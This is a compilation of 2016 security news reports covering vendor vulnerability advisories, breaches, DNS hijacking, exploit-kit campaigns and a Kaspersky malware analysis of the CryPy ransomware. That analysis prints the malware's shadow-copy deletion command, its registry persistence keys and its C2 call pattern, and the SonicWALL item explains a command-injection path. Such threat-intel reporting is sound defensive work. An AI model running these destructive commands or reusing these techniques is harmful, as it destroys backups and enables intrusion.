SonicWALL Email Security appliance flaws could expose corporate emails
14.10.2016 securityaffairs Vulnerebility
Dell issued the SonicWALL Email Security OS 8.3.2 release to address high severity issues that can be exploited to take control of the appliance.
Security researchers at Digital Defense discovered multiple vulnerabilities while assessed the SonicWALL Email Security virtual appliance (Version 8.3.0.6149). According to the experts. The flaws could be exploited by attackers to conduct a wide range of malicious activities, including command injection, arbitrary file deletion, denial-of-service (DoS) and information disclosure.
Below the list of vulnerabilities discovered by the experts at the Digital Defense, Inc. Vulnerability Research Team (VRT).
DDI-VRT-2016-69: Authentication Bypass in DLoadReportsServlet (High)
The attacker can access backup files that include also the SHA-1 hash of the administrator account password.
“The DLoadReportsServlet can be accessed via the http://<IP>/dload_reports URL without authentication. If any backups have been made via the web interface and the Email Security appliance is set as the storage location, they can be downloaded by supplying the path to the backup via the “snapshot” GET parameter which can be used to access any files stored in the backup directory or one of its sub-directories. ” reads the analysis published by the experts.
DDI-VRT-2016-70: Authenticated XML External Entity Injection in known_network_data_import.html (High)
The experts discovered that it is possible to launch an XML External Entity (XXE) injection attack to steal sensitive data.
DDI-VRT-2016-71: Authenticated Remote Command Execution in manage_ftpprofile.html (High)
This issue could be exploited by an attacker to send backup files to a remote FTP server.
“The SonicWALL Email Security appliance has an option to send backup files to a remote FTP server instead of storing them locally on the appliance. To use this functionality, the user would need to create an FTP profile which includes the FTP server address, port, username, password, and destination path. No sanitation is done on the user provided values for the username or password before they are saved for later use. Commands placed inside backticks or semicolons can be injected via the username or password parameters.” states the analysis published by Digital Defense.
DDI-VRT-2016-72: Authenticated Arbitrary File Deletion in policy_dictionary.html (High)
The flaw allows attackers to delete arbitrary files with root privileges and trigger DoS conditions.
The researchers discovered that a bug in the way compliance dictionaries are managed via web interface allows authenticated attackers to select any files and delete them.
“When a dictionary is selected for deletion the “save” method is called. This method first verifies that the dictionary selected for deletion is not in use before deleting the dictionary file from disk. The “save” method does not validate that the “selectedDictionary” POST parameter contains a valid dictionary before deleting the file. This allows an authenticated user to delete any files from the host that is running the SonicWALL Email Security software.” states the advisory.
The researchers explained that flawed SonicWALL Email Security virtual appliance could be always configured for external access, this means that remote attackers can take complete control of it by combining the authentication bypass and command execution flaws.
The full control over the SonicWALL Email Security virtual appliance could be exploited to capture inbound and outbound emails of the organization.
Dell has patched the issued with the new SonicWALL Email Security OS 8.3.2 release.
Cisco Meeting Server – CVE-2016-6445 flaw allows to impersonate legitimate users
14.10.2016 securityaffairs Vulnerebility
Cisco fixed a critical vulnerability in the Cisco Meeting Server, tracked as CVE-2016-6445, that allows remote attackers to impersonate legitimate users.
A security vulnerability in Cisco Meeting Server, tracked as CVE-2016-6445, could be exploited by attackers to impersonate legitimate users.
Experts from Cisco uncovered the vulnerability during a routine security audit of a customer.
The hole resides in the Extensible Messaging and Presence Protocol (XMPP) service of the Cisco Meeting Server (CMS). According to Cisco, the XMPP service incorrectly processes a deprecated authentication scheme allowing an unauthenticated attacker to access the system impersonating another user.
“A vulnerability in the Extensible Messaging and Presence Protocol (XMPP) service of the Cisco Meeting Server (CMS) could allow an unauthenticated, remote attacker to masquerade as a legitimate user.” reads the security advisory published by CISCO. “This vulnerability is due to the XMPP service incorrectly processing a deprecated authentication scheme. A successful exploit could allow an attacker to access the system as another user.”
CVE-2016-6445 flaw cisco-meeting-server
The CVE-2016-6445 flaw affects the following versions of the Cisco Meeting Server:
Cisco Meeting Server prior to 2.0.6 with XMPP enabled. Acano Server prior to 1.8.18 and prior to 1.9.6 with XMPP enabled.
Acano Server prior to 1.8.18 and prior to 1.9.6 with XMPP enabled.
CISCO urges its customers to apply appropriate updates, it also suggests as a workaround to disable the XMPP protocol using the “xmpp disable” command.
According to the company, there is no evidence that the CVE-2016-6445 has been exploited in the wild.
This is the second advisory published by Cisco for Meeting Server, a first one was published in July and it was related to a persistent cross-site scripting (XSS) flaw that allowed an unauthenticated attacker to execute arbitrary code in the context of the product’s management interface.
“A vulnerability in the web bridge that offers video via a web interface of Cisco Meeting Server Software, formerly Acano Conferencing Server, could allow an unauthenticated, remote attacker to conduct a persistent cross-site scripting (XSS) attack against a user of the web interface of an affected system.” stated the Cisco Advisory.
“The vulnerability is due to improper input validation of certain parameters that are passed to an affected device via an HTTP request. An attacker could exploit this vulnerability by persuading a user to follow a malicious link.”
Back to the CVE-2016-6445 flaw, the firmware updates can be downloaded from the CISCO Software Center (Products > Conferencing > Video Conferencing > Multiparty Conferencing > Meeting Server > Meeting Server 1000 > TelePresence Software).
Acano software can be downloaded from the Acano website.
Attackers are exploiting a recently patched high-severity DoS flaw in BIND
13.10.2016 securityaffairs Attack
Attackers are exploiting a recently patched high-severity DoS flaw, tracked as CVE-2016-2776, in the in the popular DNS software in BIND.
Last month a vulnerability in the popular DNS software BIND, tracked as CVE-2016-2776, has been patched. The flaw could be exploited by a remote attacker to trigger a DoS condition using specially crafted DNS packets. The high severity flaw initially discovered by the Internet Systems Consortium (ISC) was fixed with the release of BIND 9.9.9-P3, 9.10.4-P3 and 9.11.0rc3.
“Testing by ISC has uncovered a critical error condition which can occur when a nameserver is constructing a response. A defect in the rendering of messages into packets can cause named to exit with an assertion failure in buffer.c while constructing a response to a query that meets certain criteria.” reported the alert issued by the ISC.
“This assertion can be triggered even if the apparent source address isn’t allowed to make queries (i.e. doesn’t match ‘allow-query’).”
The flaw resides in the way DNS server constructs a response to certain queries, when the response has a size larger than the default 512 it trigger the DoS condition due to the crash of the BIND name server process.
According to the Internet Systems Consortium (ISC), after the public disclosure of the proof-of-concept (PoC) code and a Metasploit module by the Infobyte firm, threat actors in the wild exploited it to cause server crashes.
The news was confirmed by the Japan’s National Police Agency that issued a security alert titled “BIND Vulnerability (CVE-2016-2776) for the observation of indiscriminate attack activities” to warn users of ongoing attacks.
“Designated as CVE-2016-2776, this particular vulnerability can be triggered when a DNS server constructs a response to a crafted query where the response size crosses the default DNS response size 512. ISC has fixed two vulnerable functions dns_message_renderbegin () and dns_message_rendersection() to address this vulnerability.” states the analysis published by TrendMicro.
“Before patching, the server does not take fixed 12-byte DNS headers into consideration, which also adds to the response traffic after rendering the Resource Records from Query through function dns_message_rendersection(). So if the DNS response(r.length) traffic is less than 512 bytes (msg->reserved), the function will return true, but adding the fixed 12-byte header will cause the service to terminate if it exceeds the fixed reserved size of 512 bytes.”
Experts at Infobyte believe that the use of the msg->reserved variable could introduce other vulnerabilities like the CVE-2016-2776.
“Publishing a fix about a lethal bug where you would have to patch the whole internet, doesn’t leave a lot of time to find elegant solutions. So if you review the fix it’s possible that a new similar bug appears in dns_message_renderbegin(). while the use of msg->reserved is quite limited. It continues being a complex software. Meanwhile msg->reserved is still being used, the existence of a bug like CVE-2016-2776 is quite probable.” states the blog post from InfoByte.
Classified U.S. Defense Network Outage Hits Air Force’s Secret Drone Operations
13.10.2016 thehackernews Safety
U.S. drones are again in news for killing innocent people.
The Air Force is investigating the connection between the failure of its classified network, dubbed SIPRNet, at Creech Air Force Base and a series of high-profile airstrikes that went terribly wrong in September this year.
Creech Air Force Base is a secret facility outside Las Vegas, where military and Air Force pilots sitting in dark and air-conditioned rooms, 7100 miles from Syria and Afghanistan, remotely control their "targeted killing" drone campaign in a video-game-style warfare.
From this ground zero, Air Force pilots fire missiles just by triggering a joystick on a targeted areas half a world away, as well as operate drones for surveillance and intelligence gathering.
Drone operation facility at Creech Air Force Base -- a key base for worldwide drone and targeted killing operations -- has been assigned as ‘Special Access Programs’, to access SIPRnet.
What is SIPRnet?
SIPRNet, or Secret Internet Protocol Router Network, is a global United States military Internet system used for transmitting classified information, intelligence, targets, and messages at the secret level.
In other words, SIPRNet is completely parallel Internet, uses the same communications procedures and has been kept separate from the ordinary civilian Internet.
Approximately 3 Million people with secret clearances have access to SIPRNet, which includes Pentagon and military officials, Intelligence agencies, FBI, as well as diplomats in US embassies all around the World.
Classified Network Crashed at Creech Base
The network at Creech Air Force Base was crashed in early September that impacted "critical services," and has not been completely rebuilt, according to US government contracting records.
"On 9 September 2016, the SIPRNet system currently in operation at Creech AFB failed, and critical services were impacted," reads a contracting notice posted by the US government in early October.
"The services were somewhat restored with the use of multiple less powerful devices. This temporary solution stabilized the services, but will not be able to maintain the demand for very long. If this solution fails, there is currently no other backup system."
The officials would not say whether the failure was due to internal technical faults, a cyber attack, or a state-sponsored hacker. They would also not say if JWICS — a separate internet system that handles top-secret information — at Creech was also affected.
US Drones Killed around 100 Innocents within Two Weeks
Within weeks of the computer disaster, a series of airstrikes went terribly wrong, which resulted in scores of deaths in Syria, Afghanistan, and Somalia, according to BuzzFeed News.
On September 17, 62 Syrian soldiers were accidentally killed by US airstrikes in the middle of a ceasefire. On September 28, 15 innocent civilians were reportedly killed in Afghanistan by a US drone, as well as 22 Somali soldiers were reportedly killed in Somalia by US drone strikes.
All the cases are under review and investigation, and there has been no official explanation for targeting innocent people, though the United States expressed its regrets quickly after the incident, according to reports.
On October 7, the Air Force quietly announced that Creech base would be subject to a surprise cyber security inspection and warned personnel to be wary of phishing attacks and to be extra careful in securing their login credentials.
Has U.S. Classified Network Been Hacked?
These classified networks are definitely not connected to the Internet, but this does not mean that malware or well-resourced hackers can never found their ways into these critical networks.
If confirmed, this would not be the first time, when a classified computer network of US military has been compromised.
In the year 2008, The Pentagon acknowledged a significant cyber attack, Operation Buckshot Yankee, where a foreign intelligence agent used a USB drive to infect military computers used by the Central Command in overseeing combat zones in Iraq and Afghanistan with a specially crafted malware.
You might be aware of Chelsea Manning (then known as Bradley Manning), an army soldier who made headlines in 2013 when she was sentenced to 35 years in prison for leaking over 700,000 classified files to WikiLeaks.
Manning allegedly downloaded those secret documents from SIPRNet using a Lady Gaga CD.
Since these classified networks have a significant role in US national security, terrorist groups and state-sponsored hackers belonging to sophisticated nation-states like China, Russia, Iran, and North Korea have always shown large interest in targeting them.
CryPy: ransomware behind Israeli lines
13.10.2016 Kaspersky Virus
A Tweet posted recently by AVG researcher, Jakub Kroustek, suggested that a new ransomware, written entirely in Python, had been found in the wild, joining the emerging trend for Pysomwares such as the latest HolyCrypt, Fs0ciety Locker and others.
This Python executable comprises two main files. One is called boot_common.py and the other encryptor.py. The first is responsible for error-logging on Windows platforms, while the second, the encryptor, is the actual locker. Within the encryptor are a number of functions including two calls to the C&C server. The C&C is hidden behind a compromised web server located in Israel. The Israeli server was compromised using a known vulnerability in a content management system called Magento, which allowed the threat actors to upload a PHP shell script as well as additional files that assist them in streaming data from the ransomware to the C&C and back.
A notable point to mention is that the server was also used for phishing attacks, and contained Paypal phishing pages. There are strong indications that a Hebrew-speaking threat actor was behind these phishing attacks. The stolen Paypal credentials were forwarded to another remote server located in Mexico and which contains the same arbitrary file upload technique, only with a different content management.
It is a known practice for attackers to look for low-hanging fruit into which they can inject their code in order to hide their C&C server. One such example was the CTB-Locker for web servers reported last March.
Ransomware Analysis
ICON:
SHA1: ad046bfa111a493619ca404909ef82cb0107f012
MD5: 8bd7cd1eee4594ad4886ac3f1a05273b
Size: 5.22 MB
Type: exe
To reverse the executable one should first conduct a number of checks using a convenient debugger. The universal steps for unpacking an unknown packer start with trying to set a memory breakpoint on popular functions that packers use, such as VirtualAlloc.
If the breakpoint hits, the next step involves switching to user mode and setting a hardware breakpoint (on access). That will assist in inspecting where exactly the program initializes the memory block. In most cases, an executable magic header (MZ) should appear in the memory block. However, in this case the following screenshot shows the readable data that was allocated to that memory block:
After the data was allocated to the memory block, it appeared to be using VM code (python vm) to execute the code. For those who are not familiar with the term, VM code is the process of creating new instruction sets based on the author’s request. The CPU uses those instruction sets to understand the instructions.
py2exe simply converts the code to x86 assembly, the architecture used on the CPU for communication, and, by loading a python DLLs, loads all the modules into the memory.
We found that the executable file was generated using py2exe. The first indicator was a stack PUSH instruction to add the string – PY2EXE_VERBOSE: a module that compiles Python scripts to Microsoft Windows executables.
PY2EXE module string disclosure
A module that reverse the operation of the py2exe can be found in Github and is called unpy2exe. This module will revert the executable back to its origin Python compiled code (i.e. .pyc file). From that format, another step will be required to fully revert to the original code. We randomly chose to use EasyPythonDecompiler.
Fully decompiled Python scripts
In it’s current state, the executable fails to encrypt the file system, simply because the threat actors must have migrated from the current server to another. By doing so, they deleted the remaining traces of the PHP files they used for data collection from a victim’s machine. The following is the log file that is generated upon exception:
Error log file being generated by the boot_common.py
The scripts in Python use two files:
Name: boot_common.py
md5: dfd6237e26babdbc2b32fa0d625c2d16
SHA1: 38fe7b64113e467375202e2708199b45a22b25a6
Size: 3Kb
This file throws an “error” to show that the program failed to execute if there is a problem.
Name: encryptor.py
md5: 1ed3f127a0e94394ef049965bbc952ef
SHA1: 73122712b4563fadcc9871eb3fe0efdcf70bb608
Size: 9Kb
This script encrypts the victim’s files.
The ransomware disables the following features from the compromised machine:
By overwriting the registry policies it disables Registry Tools, Task Manager, CMD and Run.
list of registry manipulations
It then continues with changing bcdedit to disable recovery and ignore boot status policy.
Upon successful encryption, the ransomware will encrypt the following file extensions:
*.mid, *.wma, *.flv, *.mkv, *.mov, *.avi, *.asf, *.mpeg, *.vob, *.mpg, *.wmv, *.fla, *.swf, *.wav, *.qcow2, *.vdi, *.vmdk, *.vmx, *.gpg, *.aes, *.ARC, *.PAQ, *.tar.bz2, *.tbk, *.bak, *.tar, *.tgz, *.rar, *.zip, *.djv, *.djvu, *.svg, *.bmp, *.png, *.gif, *.raw, *.cgm, *.jpeg, *.jpg, *.tif, *.tiff, *.NEF, *.psd, *.cmd, *.class, *.jar, *.java, *.asp, *.brd, *.sch, *.dch, *.dip, *.vbs, *.asm, *.pas, *.cpp, *.php, *.ldf, *.mdf, *.ibd, *.MYI, *.MYD, *.frm, *.odb, *.dbf, *.mdb, *.sql, *.SQLITEDB, *.SQLITE3, *.asc, *.lay6, *.lay, *.ms11 (Security copy), *.sldm, *.sldx, *.ppsm, *.ppsx, *.ppam, *.docb, *.mml, *.sxm, *.otg, *.odg, *.uop, *.potx, *.potm, *.pptx, *.pptm, *.std, *.sxd, *.pot, *.pps, *.sti, *.sxi, *.otp, *.odp, *.wks, *.xltx, *.xltm, *.xlsx, *.xlsm, *.xlsb, *.slk, *.xlw, *.xlt, *.xlm, *.xlc, *.dif, *.stc, *.sxc, *.ots, *.ods, *.hwp, *.dotm, *.dotx, *.docm, *.docx, *.DOT, *.max, *.xml, *.txt, *.CSV, *.uot, *.RTF, *.pdf, *.XLS, *.PPT, *.stw, *.sxw, *.ott, *.odt, *.DOC, *.pem, *.csr, *.crt, *.key and wallet.dat to encrypt crypto currency wallets
The files are encrypted using AES with CBC mode for the following paths:
D:\\
E:\\
[userhome]\\contacts
[userhome]\\Documents\\
[userhome]\\Downloads\\
[userhome]\\Favorites\\
[userhome]\\Links\\
[userhome]\\My Documents\\
[userhome]\\My Music\\
[userhome]\\My Pictures\\
[userhome]\\My Videos\\
F:\\
.
.
Z:\\
*userhome - The current user home directory
When the encryption step is done, the ransomware will remove the restore points and write the README_FOR_DECRYPT.txt file and execute it. The following screen shot is the ransom note:
CryPy Ransomware Note embedded in the Python code
The threat actor behind the attack asks the victim to contact it via email, and to send a request to the following two email addresses to receive the decryption program:
(1) m4n14k@sigaint[.]org
(2) blackone@sigaint[.]org
Note that the ransom note contains mistakes, implying that it has been written by a non-English speaker. First, the headline is missing a ‘T’ in “IMPORTAN INFORMATION”. Second, the sentence “Decrypting of your files…” is syntatically wrong. Native speakers will be able to find additional mistakes.
The threat actor claims that files will be deleted every 6 hours, which reflects the approach of more advanced ransomwares. However, it forgets to mention proof of decryption or a channel that can be used in cases where the payment process is not responsive. This points to the executable being at an early stage of development.
The ransomware survives a reboot by adding the following keys to the registry:
Software\\Microsoft\\Windows\\CurrentVersion\\Run
regkey Software\\Microsoft\\Windows\\CurrentVersion\\Run
subkey Adobe_ReaderX
data %TEMP%\\mw.exe
regkey Software\\Microsoft\\Windows\\CurrentVersion\\Run
subkey explore_
data [userhome]\\Appdata\\local\\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.exe
The code for adding the values to the registry are located on the functions autorun() and autorun2().
These keys cause the computer to execute the files after the computer is restarted.
Right before launching the ransom note, the script calls a delete_shadow() function that takes no arguments, and simply executes the following command line code to remove all shadow copies and prevent recovery from backup:
os.system("vssadmin Delete shadows /all /Quiet")
Lastly, the file calls autorun2() fuction that copies the ransomware from its current location to C:\\Users\\\\AppData\\Local with hardcoded name:
DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.exe
C2 Communication
The ransomware hides behind an Israeli web server which was compromised using Shell script arbitrary upload written in PHP. The compromise and upload were possible because the server carried a vulnerable Magento CMS.
The executable transfers data over an unencrypted HTTP channel in clear-text. This allows for easy traffic inspection using a network listener. The following screenshot is the traffic being sent to the server:
Inspecting the Magento exploit and the compromised server, we found that the origin of the upload carries the title Pak Haxor – Auto Xploiter and the email ardiansyah09996@gmail[.]com and that the file was uploaded in August 2016, which aligns with the case in subject. The following screenshot reveals how attackers are using massive exploiters that scan for vulnerable web servers and exploit the vulnerability, which they later visit to expand their control over the server:
Part of such an exploitation technique is dropping additional PHP scripts to refine a more sophisticated attack, such as the CryPy ransomware.
One such script can be found hard-coded in the CryPy Python code, in the form of a GET request. The request is sent with two parameters to a script that was uploaded using the Auto Xploiter and carries the name victim.php. By reviewing the Python code it is easier to understand the type of data being presented in Base64 encoding format.
As seen in the screenshot above, the configurl parameter accepts a URL querystring where the victim_info input value of the info parameter is derived from the platform module.
uname() is used when one wants to return a tuple of system, node, release, version, machine and processor values. These are encoded with Base64.
The next parameter is ip which contains the socket.gethostname() which basically collects an IP address.
The querystring is then sent to urllib.urlopen(), which will send a GET request to the selected server and read the reponse content into glob_config.
The response contains a JSON format payload which is checked for the following keys:
x_ID – the victim’s unique ID to request their decryption keys after payment.
x_UDP – Not used; perhaps saved for future use.
x_PDP – Not used; perhaps saved for future use.
The second call is implemented in a function called generate_file() which is responsible for fetching a unique key for each file before encryption.
We have seen in recent lockers that, in order to demonstrate trust and integrity, the victim is able to decrypt one/two files before processing the payment. This proves decryptor validity. In order to randomly choose a file, the attacker must first generate a unique token for each one. The second PHP script found in the code is savekey.php which is described in the following screenshot and is suspected to have the C2 IP in it. It was however deleted long before we were able to reach it.
As for the first call, the second sends two parameters. The first is the file’s name and the other is the victim ID. In return, the server responds with two keys:
X – Unique key after encryption which will be appended to the file’s header.
Y – New filename which will be stored instead of the previous one.
These parameters are then sent to an encryption routine, along with the file’s original name.
IOCs
REG Keys
HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System
HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer
HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\explore_
HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Adobe_ReaderX
Domains
hxxp://www.baraherbs[.]co.il/js/owebia/victim.php
hxxp://www.baraherbs[.]co.il/js/owebia/savekey.php
Hashes
8bd7cd1eee4594ad4886ac3f1a05273b crypy.exe
1ed3f127a0e94394ef049965bbc952ef encryptor.py
Emails
m4n14k@sigaint[.]com
blackone@sigaint[.]com
Bitcoin Wallet Blockchain.info went down due to a DNS Hijacking
13.10.2016 securityaffairs Hacking
Blockchain.info, the world’s most popular Bitcoin wallet and Block Explorer service went down this week due to a DNS Hijacking attack.
Crypto-currencies continue to be a privileged target of cyber criminals, Bitcoin wallets and services provided by many companies operating in the industries have been targeted by criminal organizations as never before.
Blockchain.info, the world’s most popular Bitcoin wallet and Block Explorer service, suffered a mysterious outage this week and experts speculated that a cyber attack has disrupted the platform.
“Looks like our site is down. We’re working on it and should be back up soon.” reads the message displayed to the visitors during the downtime.
BlockChain informed its users about a possible DNS issue via Twitter.
Segui
Blockchain ✔ @blockchain
We're researching a DNS issue and looking into it. We apologize for the inconvenience. Stay tuned.
12:26 - 12 Ott 2016
67 67 Retweet 60 60 Mi piace
“We’re making progress resolving the issue, but it may take upwards of several hours until services are fully restored,” states a second Tweet from the company while users were not able to access their online accounts.
At the same time, someone on Reddit reported the changes in the DNS records.
It looks like blockchain.info has just had their domain name hijacked. The whois and DNS records suddenly jumped from CloudFlare to a cheap web host. From the cache, the names used to be
Name Server: BETH.NS.CLOUDFLARE.COM
Name Server: JAY.NS.CLOUDFLARE.COM
and were then changed to
Name Server: DED88057-1.HOSTWINDSDNS.COM
Name Server: DED88057-2.HOSTWINDSDNS.COM
when queried these are returning
;; ANSWER SECTION:
blockchain.info. 11360 IN A 192.236.200.26
or
;; ANSWER SECTION:
blockchain.info. 14400 IN A 198.44.48.226″
What happened?
The DNS server records for blockchain.info and blockchain.com were hijacked. Usually, this practice allows crooks to conduct phishing attacks in order to steal bitcoin wallet credentials.
Experts from OpenDns early detected the change in nameservers:
Segui
dnsstream @dnsstream
critical: blockchain(.)info now has completely new nameservers (ded91868-1(.)hostwindsdns(.)com,ded91868-2(.)hostwindsdns(.)com)
12:34 - 12 Ott 2016
2 2 Retweet 3 3 Mi piace
Experts at OpenDns investigates on the IP changes:
OpenDNS blocked the above IPs to prevent their customers using Bitcoins to fall victim of the scammer.
Fortunately, nothing happened to the Blockchain users, but DNS hijacking are very dangerous because unaware users could be redirected to rogue websites that mimic the legitimate ones in the attempt of stealing credentials.
Below the official statement issued by the company about the incident:
“Earlier today, we discovered our DNS registrar had been compromised. We took immediate action to resolve the issue. To be abundantly cautious, we’re waiting for the DNS to propagate universally across the web before bringing our services back. Once DNS has propagated, we expect to restore services ASAP. Our sincerest apologies for any inconvenience.”
At the time I was writing there is no news regarding potential breaches of the users’ bitcoin wallets.
Experts observed several malvertising campaigns deliver Cerber 4.0
13.10.2016 securityaffairs Virus
Cerber 4.0 is the latest variant of the Cerber ransomware family that is becoming even more common in the malvertising campaign in the wild.
Another variant of the notorious Cerber ransomware, the Cerber 4.0, appeared in the wild delivered by several exploit kits, including RIG, Neutrino, and Magnitude EKs.
According to the experts from Trend Micro, the Cerber 4.0 first appeared in October and became very popular in the criminal ecosystem where it is still used to power several malvertising campaigns.
The Cerber ransomware has rapidly evolved since its first apparition, it is considered one of the greatest success of the Ransomware-as-a-service (RaaS).
The Cerber 4.0 was released in the wild a few weeks after the version 3.0, it encrypts files and appends a randomly generated file extension (while the previously used extensions were .cerber3, .cerber2, .cerber).
The newest variant has shifted from an HTML ransom note to an HTA one.
The experts noticed that recently Cerber 4.0 is mainly dropped by the RIG toolkit, which is also the most active Exploit kit in this period.
The RIG toolkit was observed for example in the PseudoDarkleech malvertising campaign that was previously seen distributing ransomware such as CrypMIC and CryptXXX.
“As we reported previously, Cerber has become one of the most prominent ransomware families of 2016. It has a wide range of capabilities and is often bought and sold as a service (ransomware-as-a-service or RaaS)—even earlier versions were peddled as RaaS in underground markets. The rapid release of Cerber updates have made it an increasingly popular payload for several exploit kits. ” reported TrendMicro.
The experts also noticed another malvertising campaign dropping the Cerber 4.0 via the Magnitude exploit kit. The campaign has been seen targeting devices in numerous Asian countries, including Taiwan, Korea, Hong Kong, Singapore, and China.
The experts noticed many other campaigns leveraging on the Cerber 4.0 including one that usually employs a casino-themed fake advertisement.
Another campaign started on October 3 is leveraging the Neutrino exploit kit to target users in the US, Germany, Spain, Taiwan, and Korea.
“Malvertising and exploit kits in general are being developed and improved constantly by cybercriminals, so keeping software updated with the latest security patches is critical for users and enterprises. This includes both the operating system and all applications being used. Make sure there is a security system in place that can proactively provide a comprehensive defense against attackers targeting new vulnerabilities,” Trend Micro researchers note.
Vera Bradley retail chain notifies customers of data breach
13.10.2016 securityaffairs Crime
The American retail chain Vera Bradley announced that hackers have stolen a yet undetermined number of payment card data from its systems.
The American retail chain Vera Bradley is the last victim of a data breach, the company announced that hackers have stolen a yet undetermined number of payment card data.
The breaches affected customers shopping at its 112 stores and 44 outlets between in the period between 25 July and 23 September 2016. It seems that customers shopping on the official website was not impacted.
The FBI alerted the Vera Bradley company to the breach on 15 September, experts from the forensics firm Mandiant that investigated the incident confirmed the theft of credit card track data.
“On September 15, 2016, Vera Bradley was provided information from law enforcement regarding a potential data security issue related to our retail store network. Upon learning this information, we immediately notified the payment card networks and initiated an investigation with the assistance of a leading computer security firm to aggressively gather facts and determine the scope of the issue.” states the official announcement published by the company.
“Payment cards used at Vera Bradley retail store locations between July 25, 2016 and September 23, 2016 may have been affected. Not all cards used during this time frame were affected. Cards used on our website have not been affected. Findings from the investigation show unauthorised access to Vera Bradley’s payment processing system and the installation of a program that looked for payment card data,” added the company.
The hackers breached the network of the company and installed a malware on its servers that exfiltrated payment card data.
“The program was specifically designed to find track data in the magnetic stripe of a payment card that may contain the card number, cardholder name, expiration date, and internal verification code – as the data was being routed through the affected payment systems.” states Vera Bradley.
Vera Bradley data-breach
Crooks accessed card number, cardholder name, expiration date, internal verification code, and other information stored in magnetic stripe track of the cards.
“Payment cards used at Vera Bradley retail store locations between July 25, 2016 and September 23, 2016 may have been affected. Not all cards used during this time frame were affected. Cards used on our website have not been affected.” reads the notice of data breach. “On September 15, 2016, Vera Bradley was provided information from law enforcement regarding a potential data security issue related to our retail store network. Upon learning this information, we immediately notified the payment card networks and initiated an investigation with the assistance of a leading computer security firm to aggressively gather facts and determine the scope of the issue. Findings from the investigation show unauthorized access to Vera Bradley’s payment processing system and the installation of a program that looked for payment card data. “
Vera Bradley confirmed that not all credit cards used during the period were exposed, anyway it is important that customers monitor their bank accounts promtly reporting any unauthorised card charges.
The company confirmed to have stopped this incident and said that it is still working with the forensics security firm to improve the security of its systems to prevent similar incidents in the future.
This incident is the latest in a series of recent US retail chain breaches affecting the likes of Wendy’s, Hard Rock Hotel and Casino Las Vegas, and Eddie Bauer.
Trust me, I have a pen
13.10.2016 Kaspersky Security
Earlier today we became aware of a malicious website delivering Petya through the Hunter exploit kit. While there is nothing special about yet another exploit kit page, this one caught our attention because it mimics the index page of our sinkhole systems.
A malicious webpage faking one of our research systems
With cybercriminals increasingly trying to exploit trust relationships in cyberspace, it’s easy to get fooled by such attempts. We believe the criminals attempted to mimic our sinkhole systems in order to avoid being shut down by other researchers.
Just last week we were investigating a case of a serious attack that potentially breached a company. When we collected proof of the attack, we had to contact the company to help them isolate compromised systems and remediate. This brought us to a problem we commonly see today: the problem of trust.
The first reaction you normally have when someone calls you and attempts to convince you must arouse suspicion. In our investigations we normally deal with security personnel, who are highly paranoid people and do not trust anyone by nature. So far, the reaction of the company’s security staff was spot on: get the name of the caller, the company and department name, look up the company contacts using an independent, trusted, verifiable source, contact the company and confirm the facts, asking to connect to the researcher in the office immediately to do additional voice recognition. When that is done, the conversation can be resumed. Such a reaction and verification process is what we consider standard in our business. Unfortunately, we haven’t seen the same level of cautiousness among regular users.
A typical strategy for cybercriminals is to try to hide their tools, exploit kits and other malicious files on a compromised legitimate website or inject a malicious payload into a hijacked banner network account. Attackers also will rip entire websites, or just replace links to redirect visitors to attacker controlled sites, as we observed with the StrongPity watering holes. In this case, they simply counted on the confusion caused by visual appearance.
The fake webpage looks exactly the same as the original one from our research server and there is no point in finding even minor differences. Every webpage on the web can be copied and made to look identical to the source, except for the page’s original address or validated SSL certificate. PGPHtml is an alternative possibility, with each page explicitly stating its host domain or IP and then signed and verified with a public key. The server in question has been reportedly serving the Pony Trojan, hosting the Hunter Exploit Kit and distributing Petya ransomware.
We believe that this was the act of Russian-speaking cybercriminals, who send messages to our side every time their activities are affected by the work we do. We are bringing this to your attention to make you a little bit more cautious. Having said that, our first reaction was laughter, because it brought back some memories of an excellent short video on this matter shot by our colleagues from the security industry. And, because of this history of receiving messages from malware authors in their code and on sites, we think it is unlikely that this site is a watering hole targeting security researchers.
Unfortunately, this game of shadows is a well-known method not only in the criminal world but also in the world of advanced targeted attackers. We have seen in the past that some APT groups use deceiving tactics in order to try to confuse security researchers into wrong attribution. We have seen malware samples in the past where attackers from one group implanted decoys, trying to mimic the behaviour of their rivals. This is done to harden the research process or consume extra time. The attribution process, being the hardest part of any computer investigation, can easily be driven in the wrong direction. However, we have been looking at these attempts for a long time and learned to recognize such false flags. Now we would like you to be cautious and verify everything you see.
Related to this topic, our colleagues recently presented a more in-depth analysis of these techniques at VB 2016. You can read their entire paper here: Wave your false flags!
On the StrongPity Waterhole Attacks Targeting Italian and Belgian Encryption Users
13.10.2016 Kaspersky APT
The StrongPity APT is a technically capable group operating under the radar for several years. The group has quietly deployed zero-day in the past, effectively spearphished targets, and maintains a modular toolset. What is most interesting about this group’s more recent activity however, is their focus on users of encryption tools, peaking this summer. In particular, the focus was on Italian and Belgian users, but the StrongPity watering holes affected systems in far more locations than just those two. Adding in their creative waterholing and poisoned installer tactics, we describe the StrongPity APT as not only determined and well-resourced, but fairly reckless and innovative as well.
Encryption Tools
Clearly this APT is interested in encrypted data and communications. The tools targeted by this group enable practices for securing secrecy and integrity of data. For example, WinRAR packs and encrypts files with strong suites like AES-256, and TrueCrypt encrypts full hard drives all in one swoop. Both WinRAR and TrueCrypt help provide strong and reliable encryption. WinRAR enables a person to encrypt a file with AES-256 in CBC mode with a strong PBKDF2 HMAC-SHA256 based key. And, TrueCrypt provides an effective open-source full disk encryption solution for Windows, Apple, Linux, and Android systems. Using both of these tools together, a sort of one off, poor man’s end-to-end encryption can be maintained for free by putting these two solutions together with free file sharing services.
Other software applications help to support encrypted sessions and communications. Well known applications supporting end-to-end encryption are used by hundreds of millions of folks, sometimes unknowingly, every day. IM clients like Microsoft’s Skype implement 256-bit AES encrypted communications, while Putty, Winscp and Windows Remote Desktop help provide private communications and sessions with fully encrypted communications as well. Most of these communications across the wire are currently unbreakable when intercepted, at least, when the applications are configured properly.
Summer 2016 Watering Hole Resources and Trickery – WinRAR and TrueCrypt
